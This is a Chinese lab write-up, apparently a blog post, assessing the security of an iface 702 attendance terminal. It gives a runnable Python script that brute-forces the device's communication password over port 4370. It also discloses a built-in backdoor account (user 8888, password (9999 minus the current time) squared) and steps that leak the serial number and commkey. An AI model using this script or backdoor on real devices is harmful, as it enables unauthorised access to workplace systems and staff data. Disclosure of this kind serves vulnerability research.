本次实验室是为了分析物联网设备iface 702考勤机是否存在网络安全风险。经过实验记录来看,该设备接口比较脆弱。
telent连接
端口分析
Telnet进入后查看端口开放情况
发现8000端口
数据库分析
8000端口疑似时钟服务器内置地址
获得设备信息
使用该IP,本地监听泄漏SN、commkey信息
通讯密码爆破
from zk import ZK, const
ip = '10.97.218.209'
conn = None
for i in range(0,10001):
# print(i)
try:
zk = ZK(ip, port=4370, timeout=5, password=i, force_udp=False, ommit_ping=True)
conn = zk.connect()
print("Password Found --> ",i)
break
except Exception as e:
print(i,e)
finally:
if conn:
conn.disconnect()
管理软件连接
爆破获得通讯密码12(12是我修改过的密码,默认为0)
输入ip地址、端口:4370、通讯密码:12、机器号:1

易被当作后门利用的账户
内置用户,用户名8888,密码(9999-当前时间)²
如:当前时间20点33就是 (9999-2033)² =63457156
注:1分钟内输入否则密码会变
获取当前账户密码
除了内置账户,我们可以通过接口测试,获得当前账户密码,通过ID和密码可以登陆账户
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)